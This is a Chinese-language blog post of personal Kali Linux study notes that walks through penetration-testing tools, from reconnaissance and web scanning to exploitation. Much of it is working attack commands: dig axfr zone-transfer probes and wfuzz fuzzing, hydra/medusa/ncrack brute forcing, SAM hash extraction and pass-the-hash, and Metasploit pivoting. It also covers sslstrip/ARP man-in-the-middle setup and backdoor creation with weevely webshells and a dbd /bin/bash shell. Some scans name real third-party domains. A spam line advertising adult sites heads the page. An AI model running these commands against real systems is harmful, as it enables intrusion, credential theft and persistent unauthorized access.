压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

Kali linux 自學心得

  一.kali 安全滲透的一般測試 流程

  1.信息收集

  目標在線主機,域名信息,郵箱地址,常用密碼,同網段信息,子域名信息,指紋信息,端口信息

  2.漏洞分析

  cisco工具集(cisoco工具)

  fuzzing工具集

  openvas

  開源評估軟件

  掃描工具集

  數據庫評估軟件

  3.漏洞利用

  4.權限維持(創建一個后門)

  5.文檔編輯

  二.谷歌黑客(goole hacker)

  1.通過互聯網

  searchdns.netcraft.com DNS查詢

  shodaning.com大數據

  http://www.exploit-db.com/google-dorks/

  1 theHarverster信息搜集工具

  theharvester -d microsoft.com -l 500 -b google

  theharvester -d microsoft.com -b pgp

  theharvester -d microsoft -l 200 -b linkedin

  theharvester -d microsoft.com -l 500 -b all

  2 metagoolefil

  Usage: metagoofil options

  -d: domain to search

  -t: filetype to download (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)

  -l: limit of results to search (default 200)

  -h: work with documents in directory (use "yes" for local analysis)

  -n: limit of files to download

  -o: working directory (location to save downloaded files)

  -f: output file

  Examples:

  metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html

  metagoofil.py -h yes -o applefiles -f results.html (local dir analysis)

  三.信息搜集之目標獲取

  域名系統是因特網的一項服務,它作為域名和IP地址相互映射的一個分布式的數據庫

  從給定一個主域名到一個子域名的信息收集,是對目標的獲取與整理。dnsmap,dnsenum,fierce,dnsdict6

  DNS區域傳送指得是一臺備用服務器使用來自主服務器的數據刷新自己的域數據庫。這為運行中的dns服務提供了一定的冗余度,其目的是為了防止主的域名服務器因意外故障變得不可用是影響到整個域名的解析。

  一般來說,DNS區域傳送操作只在網絡里真的有備用域名DNS服務器時,才有必要用到,但許多DNS服務器卻別錯誤地配置成只要有client發出請求,就會向對方提供一個zone數據庫的詳細信息。

  由此暴露出威脅:一旦黑客列出某個特定的zone的所有主機,收集域信息,即可選擇性的攻擊目標,找出未公開使用的IP地址,繞過基于網絡的訪問控制。

  比如訪問163,可以把所有的IP地址全部列出來,公開的和不公開的,攻擊者就可以選擇一些弱的IP來進行攻擊。

  使用dig進行域名解析(windows nklookup)

  使用dig進行域傳送漏洞

  子域名枚舉工具的介紹與使用

  dig NS www.secsino.com

  secsino.com.  5 IN NS ns3.cdncenter.com.

  secsino.com.  5 IN NS ns6.cdncenter.com.

  secsino.com.  5 IN NS ns4.cdncenter.com.

  secsino.com.  5 IN NS ns5.cdncenter.com.

  secsino.com.  5 IN NS ns2.cdncenter.com.

  secsino.com.  5 IN NS ns1.cdncenter.com.

  一個6個

  來測試是否有域傳送漏洞信息

  dig axfr @ns1.cndcenter.com secsino.com

  DNS分析工具

  fierce

  fierce -dns www.secsino.com

  進行查詢域傳送漏洞,如果沒有進行枚舉和破解

  dnsmap secsino.com

  dnsdict6 -4 secsino.com

  四.信息收集和主機探測

  netenum 192.168.1.1/24 >test

  是通過ping來查看主機是否在線,不是特別靠譜,如果對方有防火墻就不可以了。可以生成一個列表。

  fping -g ip

  可以查看那些主機是存活的。

  nbtscan -r 172.17.135.0/24

  nbtscan -r 172.17.135.0/24

  Doing NBT name scan for addresses from 172.17.135.0/24

  IP address       NetBIOS Name     Server    User             MAC address

  ——————————————————————————

  172.17.135.1     PC-20141108YKCA  <server>  <unknown>        24:b6:fd:1a:87:dd

  172.17.135.2     REDBULL          <server>  <unknown>        00:0c:29:09:bb:e8

  172.17.135.3     TXD-1419165F468  <server>  <unknown>        00:0c:29:d2:45:88

  172.17.135.131   BOBO             <server>  <unknown>        8c:89:a5:27:b5:b6

  172.17.135.140   DYJ              <server>  <unknown>        08:10:76:df:4d:83

  arping 172.17.135.4

  可以查看到mac地址的

  嗅探內網包(借助于一些ARP協議包的掃描)

  netdiscover -h

  Currently scanning: 192.168.224.0/16   |   Screen View: Unique Hosts

  5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300

  _____________________________________________________________________________

  IP            At MAC Address      Count  Len   MAC Vendor

  —————————————————————————–

  192.168.149.2   00:50:56:ef:8b:c6    03    180   VMWare, Inc.

  192.168.149.1   00:50:56:c0:00:08    01    060   VMWare, Inc.

  192.168.149.254 00:50:56:fa:94:bd    01    060   VMWare, Inc.

  dmitry cidp.edu.cn

  可以看到一些注冊人,和子域名的信息

  wafw00f http://www.cidp.edu.cn

  看是否有waf有保護,先用一個黑名單進行發送,然后看看發送回來有沒有。

  Checking http://www.cidp.edu.cn

  Generic Detection results:

  No WAF detected by the generic detection

  Number of requests: 13

  對目標是否存在負載均衡檢測器工具

  可以檢測多個IP地址映射到單個域名

  lbd www.cidp.edu.cn

  五.信息搜集之主機掃描

  (課程目的,課程介紹)

  1主機探測 版本探測 系統探測 支持探測腳本的編寫

  https 443 weblogic701 oracle 1521

  nmap的使用

  nmap -iL target.txt 保存到一個列表

  zenmap

  六.信息搜集之指紋識別

  1.banner抓取最簡單最基礎,不需要專門的工具就可以做。banner抓取是應用程序的指紋識別而不是操作系統的識別。

  curl -I www.cidp.edu.cn

  curl -I www.cidp.edu.cn

  HTTP/1.1 200 OK

  Date: Mon, 01 Dec 2014 11:24:42 GMT

  Server: Apache/2.0.59 (Unix)

  Last-Modified: Mon, 01 Dec 2014 07:12:49 GMT

  ETag: "ee8001-6939-568a5e40"

  Accept-Ranges: bytes

  Content-Length: 26937

  Content-Type: text/html

  有時候Telnet也可以進行探測,nc有時候也可以。

  nmap -sV -Pn -sT www.cidp.edu.cn -p80

  xprobe2 目標地址 對于老系統比較好

  被動指紋識別工具

  p0f    進行被動抓取數據包

  web指紋識別

  whatweb www.cidp.edu.cn

  http://www.cidp.edu.cn [200] ActiveX[Flash-ActiveX][d27cdb6e-ae6d-11cf-96b8-444553540000], Adobe-Flash, Apache[2.0.59], Country[CHINA][CN], Frame, HTTPServer[Unix][Apache/2.0.59 (Unix)], IP[211.71.233.21], JQuery, Meta-Author[%E5%A4%A7%E6%B1%89%E7%BD%91%E7%BB%9C], Object["http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0]["clsid:d27cdb6e-ae6d-11cf-96b8-444553540000], Script[javascript,text/javascript], Title[%E9%98%B2%E7%81%BE%E7%A7%91%E6%8A%80%E5%AD%A6%E9%99%A2]

  探取cms識別工具

  wpscan -u www.91ri.org

  七.信息搜集 協議分析

  針對smb利用工具

  acccheck  主要檢查共享連接 ipc$ admin$,利用用戶名和密碼來進行攻擊。

  amples

  Attempt the 'Administrator' account with a [BLANK] password.

  acccheck -t 10.10.10.1

  Attempt all passwords in 'password.txt' against the 'Administrator' account.

  acccheck -t 10.10.10.1 -P password.txt

  Attempt all password in 'password.txt' against all users in 'users.txt'.

  acccehck -t 10.10.10.1 -U users.txt -P password.txt

  Attempt a single password against a single user.

  acccheck -t 10.10.10.1 -u administrator -p password

  smtp-user-enum 來查看有哪些郵箱等等

  $ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1

  $ smtp-user-enum.pl -M EXPN -u admin1 -t 10.0.0.1

  $ smtp-user-enum.pl -M RCPT -U users.txt -T mail-server-ips.txt

  $ smtp-user-enum.pl -M EXPN -D example.com -U users.txt -t 10.0.0.1

  sslscan ip  查看證書,查看是那種加密方式,最后可以得到一些公鑰信息

  數據包分析工具 wireshark

  八.openvas安裝與使用

  做出作為一個nessus的子工具,也是一個綜合掃描的子工具。

  先進行安裝

  openvas-check-setup 檢查更新

  openvas-mkcert 安裝證書(后面全部選擇默認)

  openvas-nvt-sync 更新一些包

  openvas-mkcert-client -n om -i 為客戶端創建證書

  證書創建成功后,必須創建一個用戶進行登錄

  openvasad -c add_user -n root -r Admin

  openvassd 必須加載一個插件的加載

  openvasmd –rebuild

  更新漏洞庫內容

  openvas-scapdata-sync 更新一些漏洞信息

  openvas-certdata-sync

  更新完以后可以運行 openvasmd –rebuild

  更新完以后,需要結束openvassd進程,重新啟動服務,使用openvas-check-setup檢查無誤。

  openvas-start

  openvasmd  管理那個模塊沒有開啟,手動開啟

  gsad –listen=0.0.0.0 –port=9392 –alisten=127.0.0.1 –aport=9390 –http-only

  默認端口是9392端口打開的

  https://localhost:9392/就可以進行登錄

  九.web掃描工具的應用

  1 golismero scan http://secsino.com

  2 nikto -h www.secsino.com

  nikto -h www.secsino.com -p 80,445,21 對指定端口進行掃描

  lynis 系統信息收集工具

  lynis –cheak–all

  默認為當前的操作系統

  unix-privesc-check standard

  十.漏洞分析之web爬行

  內部字典存放的位置

  /usr/shell/wordlists

  1.apche-users -h 172.17.135.4  -l /usr/share/wordlists/apache-user2.0.txt -p 80 -s 0 -e 403 -t 10

  這個就是枚舉的過程,判斷目錄是否存在。

  2.cutycap –url=http://www.baidu.com –out=baidu.png

  相當于對百度網站直接做了一個截圖(快照)

  3.強大的目錄掃描工具

  dirb http://172.17.135.3

  4.dirbuster 圖形化的界面工具

  5.vega 相當于awvs ,但是不是商業化軟件

  6.webslayer

  web測試,暴力攻擊

  十一.漏洞掃描工具

  cadaver

  root@kaifeng:~# cadaver –help

  Usage: cadaver [OPTIONS] http://hostname[:port]/path

  Port defaults to 80, path defaults to '/'

  Options:

  -t, –tolerant            Allow cd/open into non-WebDAV enabled collection.

  -r, –rcfile=FILE         Read script from FILE instead of ~/.cadaverrc.

  -p, –proxy=PROXY[:PORT]  Use proxy host PROXY and optional proxy port PORT.

  -V, –version             Display version information.

  -h, –help                Display this help message.

  Please send bug reports and feature requests to <cadaver@webdav.org>

  cadaver是一個用來瀏覽和修改webdav共享的Unix命令行程序,就像subversion客戶端,它使用了neon的http庫,不需要驚訝,neon和cadaver人作者是同一個人。cadaver是自由軟件。使用cadaver就像使用命令行的FTP程序,因此他很適合基本的webdav調試。它可以以壓縮的方式上傳和下載文件,也會檢驗屬性,拷貝,移動和鎖定和檢索文件。

  1.cadaver http://172.17.135.22/dav/

  可以put get 等等一系列操作和iisput差不多

  davtest可以自動上傳一個漏洞文件,一些木馬文件

  2.deblaze  xss或者web會用到

  3.fimap 遠程文件和本地的漏洞掃描文件,會檢測一些遠程和本地包含漏洞測試。

  fimap -u "路徑" –force-run

  就可以檢測到可以讀取那些內容

  如果get一個webshell

  fimap -x –force-run 根據提示來進行操作,上傳一個shell,然后在進行提權。

  4.Grabber web漏洞掃描器

  root@kaifeng:~# grabber -h

  Usage: grabber.py [options]

  Options:

  -h, –help            show this help message and exit

  -u ARCHIVES_URL, –url=ARCHIVES_URL

  Adress to investigate

  -s, –sql             Look for the SQL Injection

  -x, –xss             Perform XSS attacks

  -b, –bsql            Look for blind SQL Injection

  -z, –backup          Look for backup files

  -d SPIDER, –spider=SPIDER

  Look for every files

  -i, –include         Perform File Insertion attacks

  -j, –javascript      Test the javascript code ?

  -c, –crystal         Simple crystal ball test.

  -e, –session         Session evaluations

  eg:grabber –spider 1 –sql –xss –url http://172.17.135.22/

  5. joomscan 針對joomlacms來進行測試

  6. skipfish 是Google出品的一款自動化網絡安全掃描工具

  skipfish -o ~/home/kaifeng(自己創建的目錄) 很好工具http://www.cidp.edu.cn

  7.uniscan-gui 一款圖形化界面

  8.W3af 是一個應用程序攻擊檢查文件,支持許多插件

  9.wapiti 的工作方式和nikto差不多

  python wapiti.py http://172.17.135.22 -v 2

  可以檢測文件處理錯誤(本地和遠程)數據庫注入

  xss注入 xss注入 ldap注入 命令執行檢測(eval(),system(),passtru()。。)crlf注射入(http響應,session固定等等)

  root@kaifeng:~# wapiti http://www.cidp.edu.cn

  Wapiti-2.2.1 (wapiti.sourceforge.net)

  Traceback (most recent call last):

  File "/usr/bin/wapiti", line 444, in <module>

  wap.browse(crawlerFile)

  File "/usr/bin/wapiti", line 238, in browse

  self.urls, self.forms = self.HTTP.browse(crawlerFile)

  可以爬取一些信息

  10.webshag-gui 綜合的條用一些插件

  11.websploit 掃描遠程和分析系統漏洞。可以快速的掃描

  wsf > show modules

  Web Modules   Description

  ——————-  ———————

  web/apache_users  Scan Directory Of Apache Users

  web/dir_scanner   Directory Scanner

  web/wmap   Information Gathering From Victim Web Using (Metasploit Wmap)

  web/pma    PHPMyAdmin Login Page Scanner

  web/cloudflare_resolver  CloudFlare Resolver

  Network Modules   Description

  ——————-  ———————

  network/arp_dos   ARP Cache Denial Of Service Attack

  network/mfod   Middle Finger Of Doom Attack

  network/mitm   Man In The Middle Attack

  network/mlitm   Man Left In The Middle Attack

  network/webkiller  TCP Kill Attack

  network/fakeupdate  Fake Update Attack Using DNS Spoof

  network/arp_poisoner  Arp Poisoner

  Exploit Modules   Description

  ——————-  ———————

  exploit/autopwn   Metasploit Autopwn Service

  exploit/browser_autopwn  Metasploit Browser Autopwn Service

  exploit/java_applet  Java Applet Attack (Using HTML)

  Wireless / Bluetooth Modules  Description

  ——————-  ———————

  wifi/wifi_jammer  Wifi Jammer

  wifi/wifi_dos   Wifi Dos Attack

  wifi/wifi_honeypot  Wireless Honeypot(Fake AP)

  bluetooth/bluetooth_pod  Bluetooth Ping Of Death Attack

  十二.數據庫漏洞工具

  1.tnscmd10g 不經常用

  2.sqlsus 開放源代碼MySQL注入和接管工具

  root@kaifeng:~# sqlsus

  sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

  Usage:

  sqlsus [options] [config file]

  Options:

  -h, –help                    brief help message

  -v, –version                 version information

  -e, –execute <commands>      execute commands and exit

  -g, –genconf <filename>      generate configuration file

  sqlsus -g test.comf 生成一個配置文件,然后進行編輯

  修改 our $url_start="";寫入地址

  啟動并且調試

  sqlsus test.conf 獲取數據庫數據

  查看全部數據庫名字

  sqlsus>get database

  sqlsus>set database 設定數據庫

  sqlsus>set database mysql 選定為MySQL數據庫

  sqlsus>get tables 獲取為MySQL的數據庫表

  3.sqlninja 主要針對sqlserver數據庫,來返回一個xp_cmdshell,對sa口令的強力攻擊

  root@kaifeng:~# sqlninja

  Sqlninja rel. 0.2.6-r1

  Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>

  Usage: /usr/bin/sqlninja

  -m <mode> : Required. Available modes are:  //指定攻擊模塊,有以下幾個

  t/test – test whether the injection is working  #測試連接是否是注入點

  f/fingerprint – fingerprint user, xp_cmdshell and more  #指紋識別,判斷用戶,數據庫,xp_cmdshell是否能用等等

  b/bruteforce – bruteforce sa account  #暴力破解sa密碼,可以使用-w指定字典,也可以不使用字典,這樣sqlninja就會自己窮舉

  e/escalation – add user to sysadmin server role  #提權用,必須用-p指定sa的password,成功就會把當前數據庫加入到sa組里面

  x/resurrectxp – try to recreate xp_cmdshell  #嘗試恢復xp_cmdshell

  u/upload – upload a .scr file   #使用get和post上傳二進制文件,-p可以指定sa的password,-g表示只生成上傳文件,但并不上傳

  s/dirshell – start a direct shell  # 獲得目標主機的shell

  k/backscan – look for an open outbound port  #查看開放的端口

  r/revshell – start a reverse shell   #反彈會一個shell,和dirshell相反

  d/dnstunnel – attempt a dns tunneled shell  #指定使用DNS作為傳輸通道,可用-p指定sa的password,為什么有這個模式。因為可能服務器連icmp都禁止。同樣想要使用這個模式得先用upload模式上傳dnstun.exe

  i/icmpshell – start a reverse ICMP shell  #檔dirshell和revshell都失敗的情況下,可以用這個模式把shell藏在icmp里,但是先要上傳imcpsh.exe(在upload模式里)

  c/sqlcmd – issue a 'blind' OS command   #以上方法都失敗之后,可以用它執行簡單的cmd命令,可惜的是沒回回顯

  m/metasploit – wrapper to Metasploit stagers  #使用metasploit作為shell

  -f <file> : configuration file (default: sqlninja.conf)  #指定配置文件,sqlninja沒有類似sqlmap的“-u”參數,注入網址是寫在配置文件里的,默認是sqlninja.conf。 用數字(0,1,2,3,4)來指定數據庫。

  -p <password> : sa password

  -w <wordlist> : wordlist to use in bruteforce mode (dictionary method

  only)

  -g : generate debug script and exit (only valid in upload mode)

  -v : verbose output

  -d <mode> : activate debug

  1 – print each injected command

  2 – print each raw HTTP request

  3 – print each raw HTTP response

  all – all of the above

  …see sqlninja-howto.html for details

  默認參數也要寫到配置文件里面,默認為sqlninja.conf

  sqlmap

  sqlmap -u "" –cookie='PHPSESSID=;secsicuty=low'

  十三.web代理

  代理工具數據,進行抓包改包,暴力攻擊等等一些操作

  1.burp suite 代理代表的一些工具

  2.owasp-zap

  3.vega 有一個代理

  4.webscarab

  webscarab一款代理軟件,包括http代理,網絡爬行、網絡蜘蛛,回話ID分析,自動腳本接口,模糊測試工具,web格式的編碼/解碼,web服務描述語言和soap解析器等功能模塊。webscarab基于gun協議,使用Java編寫,是webgoat中所使用的工具之一。

  十四.漏洞分析工具fuzz

  1.bed 能夠檢查緩存區溢出,格式串漏洞,整數溢出

  bed -s FTP -t 172.17.132.2 -p 21 -o 5

  2.ohrwurm 主要是rtp

  3.wfuzz web應用的模糊測試工具,可以進行web應用暴力拆解,也支持對網站目錄,登錄信息,應用資源文件等的暴力猜解,還可以進行get及post參數的猜解,sql注入,xss漏洞的測試。改工具所有功能都依賴于字典。

  wfuzz -c -z file,common.txt –hc 404 -o html http://www.baidu.com/FUZZ 2>tes.html

  wfuzz -c -z file,users.txt -z file,pass.txt –hc 404 http://www.site.com/log.asp?user=FUZZ&pass=FUZZ

  登錄頁面口令猜解,忽略404頁面

  wfuzz -c -z range,1-10 –hc=BBB http://www.site.com/FUZZ{something}

  頁面數目猜解,與burp不同的是,它更輕量級。

  4.xsser 命令行版本和界面版本

  xsser -u "http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=" –cookie="PHPSESSID=3f0cbd75725ed1a9b5d47396c4aeb2a7;security=low" -v

  [*] List of possible XSS injections:

  ===========================================================================

  [I] Target: http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=

  [+] Injection: http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=/">a01a46f10d098c521b4eb470e82ea23f

  [-] Method: xss

  [-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

  十五.在線密碼攻擊

  1.cewl 是一個很酷的工具,通過爬行網站獲取關鍵信息創建一個密碼字典。

  官網:http://digi.ninja/projects/cewl.php

  2.cat 思科審計工具,掃描思科路由器的一般性漏洞:默認密碼snmpcommunity字符

  3.findmyhash

  findmyhash MD5 -h hash值 去找所有的網站的接口去破解

  4.hydra

  FTP

  hydra -L user.txt -P pass.txt -F ftp://172.17.135.2

  SSH

  hydra -L user.txt -P pass.txt -F ssh://172.17.135.2:22

  SMB

  hydra -L user.txt -P pass.txt -F smb://172.17.135.2

  MSSQL

  hydra -L user.txt -P pass.txt -F mssql://172.17.135.2:1433

  5.medusa

  medusa -h 172.17.135.2 -u root  -P //wordlist/rockyou.txt -M ssh

  6.NCrack  基本功能相似,突出是3389爆破的功能

  ncrack -vv -U windows.user -P windows.pwd 172.17.135.2:3389,CL=1 -f

  7.onesixtyone 是一個snmp掃描工具,用于找出設備上的snmp community字符,掃描速度非常快。

  8.patator  Python編寫,如枚舉一個服務用戶名和密碼

  patator ssh_login host=172.17.135.2 user=root passowrd=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'

  9.phrasendrescher

  10.thc-pptp-bruter 主要針對pptp VPN端點(tcp端口1723)的暴力破解程序。

  十六.密碼離線攻擊

  1.ophcrack 彩虹表

  2.pyrit  密碼無線攻擊

  pyrit -r xxx.cap analyze

  開始跑包(單純字典)

  pyrit -r xxx.cap -i yyy.dic -b ssid attack_passthrough

  也可以將pyrit與crunch結合使用

  crunch 8 8 1234567890 | pyrit -i – -r /file/hack01-cap -b bssid attach_passthrough

  3.rcrack 彩虹表密碼哈希工具

  4.rsmangler

  rsmangler -f /test  字典生成工具

  5.bkhive Linux下破解window下哈希的工具

  首先獲取win下的文件

  Sam文件: c:windowssystem32configsam

  system文件: c:windowssystem32configsystem

  先用bkhive從system文件生成一個bootkey文件

  bkhive  system bootkey

  再用bootkey和sam文件通過samdump2生成一個密碼hash文件

  samdump2 sam bootkey >hashes

  接著只用John破解John hashes即可。

  6.sucrack  借助su命令進行本地root賬戶的密碼破解

  7.truecrack

  十七.密碼攻擊之哈希傳遞

  個人感覺主要利用msf(psexec)這個掃描模塊來進行傳遞hash,可以返回來一個payload。

  通過Windows pwdump7.exe 來進行抓取hash

  1.pth-winexe

  pth-winexe -U Administrator和hash //172.17.135.2 cmd

  這樣就可以返回一個本地的shell

  2.keimpx

  keimpx -t 172.17.135.2 -c /root/pass.txt -v 2 看pass.txt里面保存的hash來進行一一嘗試,是否可以進行連接

  3.metaspoloit

  exploit/windows/smb/psexse

  十八.密碼無線的破解

  十九.metasploit

  在跳板機子獲取一定權限后,需要積極的向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,借助msf已經得到的meterpreter后門,可以使系列的操作更容易。

  1.首先我們先看主機網卡信息,看有多少主機

  2.如果我們拿到shell ip地址是 172.17.135.2,內網主機為10.0.0.1,因為內網ip我們是無妨訪問的。

  3.首先我們先meterpreter里面增加一條路由

  run autoroute -s 10.0.0.1 就把我們172段地址加入里面了

  4.為了訪問,我們開一個socks代理模塊

  use auxiliary/server/socks

  exploit

  這個時候我們已經創建一個代理了,然后把kali瀏覽器的代理設置成127.0.0.1 端口設置成1080,然后在訪問10.0.0.2,就可以訪問了內網的計算機了。

  run arp_scanner -h 經常查看內網主機

  run arp_scanner -r 10.0.0.1/24

  二十.kali漏洞利用工具beff

  默認的IP http://127.0.0.1:3000/ui/authentication

  beef-xss提供了一個測試頁面

  http://127.0.0.1:3000/demos/basic.html

  最重要的一項是把beef和metasploit聯合起來。下面是配置命令

  cd /usr/share/beef-xss/

  vim config.yaml //把metaspoloit那一項改成true

  cd /extension/metasploit

  nano config.yaml  //修改host和call_back都改成主機地址

  然后打開msfconsole輸入以下命令

  load msgrpc ServerHost=主機ip Pass=abc123

  cd /usr/share/beef-xss/

  ./beef -x 重新加載metasploit模塊

  這時候重啟一下服務

  service beef-xss restart

  二十一.kali漏洞利用set工具(社會工程會攻擊)

  1 命令行輸入 setoolkit打開set套件

  輸入1為社會工程會攻擊

  1魚叉式攻擊 2 網站攻擊框架 3 介質感染攻擊 4 創建payload攻擊 5群發郵件攻擊 6基于arduino的攻擊 7短信欺騙攻擊 8無線接入點攻擊 9二維碼攻擊 10 powershell攻擊 11 第三方模塊

  1.魚叉式攻擊主要目的發送存在惡意軟件的釣魚軟件,相應的payload模塊可以選擇。

  2.開放一個webserver服務,如果對方訪問此頁面,若系統存在漏洞觸發條件,則會被植入后門。 如Java applet attack 方法就需要目標有Java運行環境。為了仿真,你可以選擇自建模板或克隆一個網站。(重點演示,可以結合毒化和抓包來進行欺騙內網機子和劫持)

  3 介質感染攻擊

  借助autorun.inf執行exploit得到一個返回的shell,也可以結合metasploit的后門

  fasttrack也被整理到setoolkit里面。

  二十二.嗅探欺騙和中間人攻擊

  linux下的中間人攻擊套路都是一樣的,這里介紹進行ARP欺騙,DNS欺騙和嗅探以及回話劫持(cookie)的方法。

  1 為kali設置開啟端口轉發

  echo 1 > /proc/sys/net/ipv4/ip_forward

  2設置ssltrip

  為了劫持ssl數據,需要使https數據變為https

  iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8081

  讓ssltrip在8081端口監聽

  sslstrip -l 8081

  我們使用的工具ettercap這個中間人攻擊工具,如果是第一次使用,需要設置配置

  配置文件/etc/ettercap/etter.conf 首先要將ec_uid,ec_gid都變為0

  在把配置文件里面,在linux下面,把下面兩行注釋警號全部去掉

  第一步打開 ettercap -G 圖形化界面

  二十三.web后門

  1.weevely 僅限php,相當于菜刀的一款工具

  weevely generate test ~/1.php

  連接:weevely http://172.17.135.3/1.php test(密碼)

  2.webacoo

  webacoo -t -u http://172.17.135.3/2.php

  系統后門 首先我們先提取進程 ps aux | grep ~/bin/bash"

  1.系統端:dbd -l -p 2333(bash進程號) -e /bin/bash -k password

  連接端:dbd 127.0.0.1 2333 -k password

  連接以后,機子并沒有什么反應,但是直接執行命令就可以了。

  2.intersect

  數字1 創建一個shell

  然后依次為 bshell   creds  portscan  自由加了三個模塊。添加完以后就:create,然后輸入shell,還需要綁定端口 5555,遠程主機 172.17.135.3 遠程端口 23333 。這樣就設置完成了。完成以后,下面會給出保存的路徑。,默認為.py文件。

  執行文件

  ./shell.py -b 綁定  那么這個時候就綁定這個端口了

  我們在遠程用nc進行連接

  nc -nvv 127.0.0.1 5555  這個時候就得到一個shell了。

  二十四.權限維持之tunnel

  1.cryptcat  使用方法與dbd 方法相似

   二十五.壓力測試

  所謂壓力測試,就是攻擊服務器所能承受的范圍,所謂的ddos攻擊。

  主要是消耗某一種資源,來讓服務器不正常。

  二十六. 數字取證工具

  1.peepdf是一個使用Python編寫的PDF文件分析工具,它可以檢測惡意的pdf文件。其設計目標是為安全研究人員提供的pdf分析中可能用到的所有組件,無需使用3或4種工具來完成同一件任務。

  2.反數字取證 用來檢測 linux下面關鍵命令是否被注入了后門。

  3.內從取證工具集

  volatility是開源的window,linux等內從取證分析工具,有Python編寫成,命令行操作,支持各種操作。

  http://www.freebuf.com/articles/system/26763.html

  4 binwalk 來判斷是什么文件格式,原始文件是什么。

  5 dff 是一個簡單但強大的數字取證工具輔助工具,它具有一個靈活的模塊系統。具有多種功能,包括:恢復錯誤或奔潰導致文件丟失,證據的研究和分析等。pdf提供了一個強大的體系結構和一些有用的模塊。

  二十七.報告工具與系統服務

  1.dradis 基于瀏覽器的在線筆記

 

上一篇:安卓防火墻 PS DroidWall

下一篇:linux進程管理